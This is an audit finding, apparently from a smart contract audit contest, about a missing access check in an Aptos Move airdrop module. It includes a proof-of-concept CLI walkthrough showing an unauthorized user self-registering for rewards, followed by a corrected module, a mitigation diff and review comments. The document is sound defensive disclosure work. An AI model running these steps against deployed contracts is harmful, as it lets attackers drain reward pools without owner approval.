Submission Details
Severity: high
Valid

H-02 Complete Access Control Bypass

Root + Impact

Description

The contract lets any account register itself for the airdrop without owner approval, bypassing the intended access control entirely. get_random_slice() is exposed as an entry function with no permission check, so anyone can call it with an arbitrary address (including their own) and have a reward amount assigned to that address.

This breaks the core security model, in which only the contract owner decides who is registered for the airdrop: users can self-register and then claim rewards with no approval step at all.

// Line 121 in pizza_drop.move
#[randomness]
entry fun get_random_slice(user_addr: address) // NO ACCESS CONTROL

Risk

Likelihood:

  • Any user can call this function immediately upon contract deployment

  • No special knowledge or tools required - standard blockchain transaction

  • Function is publicly exposed in the contract interface

  • Works 100% of the time with any valid address

Impact:

  • Complete breakdown of owner-controlled registration system

  • Unlimited users can register themselves without permission

  • Owner loses all control over airdrop participant management

  • Anyone can drain the reward pool by self-registering and claiming

  • Fundamental protocol security assumptions are violated


Proof of Concept

Live blockchain demonstration with fresh contract deployment:

The test demonstrates complete bypass of the intended owner registration process. The user registered themselves and received a reward allocation without any owner interaction or permission.

# VULNERABILITY: Any user can bypass owner registration controls
# Step 1: Contract setup (normal deployment by owner)
aptos move publish --profile local --named-addresses pizza_drop=local
aptos move run --function-id 'local::airdrop::fund_pizza_drop' --args u64:1000000 --profile local
# Result: Contract deployed and funded with 1,000,000 Octas by owner
# Step 2: ATTACK - unauthorized user bypasses the registration system
# testuser calls get_random_slice() directly, without owner permission
aptos move run --function-id 'local::airdrop::get_random_slice' --args address:0xa37d1e037339b7b708236a6403e213cfbf23d980bd3003f079edb424f0b8e78b --profile testuser
# Expected: transaction should FAIL with an access control error
# Actual: transaction SUCCEEDS - "success": true, "vm_status": "Executed successfully"
# Step 3: Verification of the successful bypass
aptos move view --function-id 'local::airdrop::get_claimed_amount' --args address:0xa37d1e037339b7b708236a6403e213cfbf23d980bd3003f079edb424f0b8e78b --profile local
# Result: "459" - user was assigned 459 Octas without owner approval
# Additional verification
aptos move view --function-id 'local::airdrop::is_registered' --args address:0xa37d1e037339b7b708236a6403e213cfbf23d980bd3003f079edb424f0b8e78b --profile local
# Result: true - user is now registered in the system
# Step 4: User can now claim rewards without the owner ever approving them
aptos move run --function-id 'local::airdrop::claim_pizza_slice' --profile testuser
# This would succeed, allowing unauthorized reward claiming

Impact Demonstration:

This proof demonstrates complete breakdown of the access control system. The vulnerability allows:

  1. Unauthorized Registration: Any user can register themselves without owner approval

  2. Reward Assignment: Users receive random amounts (100-500 Octas) automatically

  3. Pool Drainage: Unlimited users can self-register and claim rewards

  4. Owner Control Loss: The intended gatekeeping mechanism is completely bypassed

Root Cause: The get_random_slice() function is marked as entry fun without any access control checks, making it publicly callable by anyone instead of being an internal helper function.
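The following is an added example, not the audited pizza_drop contract, showing the shape the fix should take: the owner-gated register_pizza_lover() is the only entry point, it carries the #[randomness] attribute that Aptos requires on the (private) entry function of any transaction that reaches the randomness API, and get_random_slice() is a plain private helper that no transaction can target. The module name airdrop_fixed, the SimpleMap-backed State, the error codes, the 100..500 Octas range and the register_pizza_lover(owner, user_addr) signature are assumptions for illustration.

```move
// Added example, not the pizza_drop project's code. Module name, State layout,
// error codes and the register_pizza_lover signature are assumptions.
module pizza_drop::airdrop_fixed {
    use std::signer;
    use aptos_std::simple_map::{Self, SimpleMap};
    use aptos_framework::randomness;

    /// Caller is not the account that published the module.
    const E_NOT_OWNER: u64 = 1;
    /// Address already has a slice assigned.
    const E_ALREADY_REGISTERED: u64 = 2;

    /// Per-user allocations, stored under the module owner's account.
    struct State has key {
        claimed: SimpleMap<address, u64>,
    }

    /// Runs once at publish time; only the publisher's signer can create State.
    fun init_module(owner: &signer) {
        move_to(owner, State { claimed: simple_map::new<address, u64>() });
    }

    /// The ONLY way to register a user. Owner-gated, and it is the private
    /// #[randomness] entry point that Aptos requires for any transaction
    /// whose call chain reaches the randomness API.
    #[randomness]
    entry fun register_pizza_lover(owner: &signer, user_addr: address) acquires State {
        // Access control: the transaction signer must be the module owner.
        assert!(signer::address_of(owner) == @pizza_drop, E_NOT_OWNER);
        assert!(!is_registered(user_addr), E_ALREADY_REGISTERED);
        get_random_slice(user_addr);
    }

    /// Private helper: no `entry`, no `public`, so a transaction cannot call
    /// it directly; only register_pizza_lover can reach it.
    fun get_random_slice(user_addr: address) acquires State {
        // 100..=500 Octas, matching the range the finding reports (assumed).
        let amount = randomness::u64_range(100, 501);
        let state = borrow_global_mut<State>(@pizza_drop);
        simple_map::add(&mut state.claimed, user_addr, amount);
    }

    #[view]
    public fun is_registered(user_addr: address): bool acquires State {
        simple_map::contains_key(&borrow_global<State>(@pizza_drop).claimed, &user_addr)
    }

    #[view]
    public fun get_claimed_amount(user_addr: address): u64 acquires State {
        let state = borrow_global<State>(@pizza_drop);
        if (simple_map::contains_key(&state.claimed, &user_addr)) {
            *simple_map::borrow(&state.claimed, &user_addr)
        } else {
            0
        }
    }

    /// A non-owner signer must be rejected before any state or randomness
    /// is touched, so no State resource is needed for this test.
    #[test(attacker = @0xbeef)]
    #[expected_failure(abort_code = E_NOT_OWNER, location = Self)]
    fun attacker_cannot_self_register(attacker: &signer) acquires State {
        register_pizza_lover(attacker, @0xbeef);
    }
}
```

With this layout the PoC's step 2 fails at the CLI stage: `aptos move run --function-id 'local::airdrop_fixed::get_random_slice'` has no entry function to target, and running register_pizza_lover from the testuser profile aborts with E_NOT_OWNER. Keeping register_pizza_lover private (no `public`) matters as well as keeping it owner-gated: Aptos only allows #[randomness] on private entry functions, which is what blocks the test-and-abort pattern against the random draw.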


Recommended Mitigation

Remove the entry modifier to make the function internal-only, callable only from register_pizza_lover() which has proper owner access control. This restores the intended security model where only the owner can register users

- #[randomness]
- entry fun get_random_slice(user_addr: address) acquires ModuleData, State {
+ fun get_random_slice(user_addr: address) acquires ModuleData, State {
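Review bot: the `-`/`+` lines drop `#[randomness]` together with `entry`, which leaves the randomness call inside a plain private helper; that is fine for the helper itself, but the function that now calls it, register_pizza_lover(), has to become the #[randomness] entry point, because on Aptos the randomness API is only reachable from a transaction whose entry function is private and annotated #[randomness], and a call from anywhere else is rejected at runtime. Suggest the diff show that move explicitly, for instance `+ #[randomness]` above `entry fun register_pizza_lover(...)` (exact signature not shown here), and that register_pizza_lover stay private rather than `public entry`, since the attribute is not allowed on public entry functions and that restriction is what prevents test-and-abort against the random draw. Worth confirming in the same hunk that the owner check in register_pizza_lover compares the transaction signer to the module owner rather than to a caller-supplied address.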
Updates

Appeal created

bube Lead Judge 11 days ago
Submission Judgement Published
Validated
Assigned finding tags:

Anyone can call `get_random_slice` function
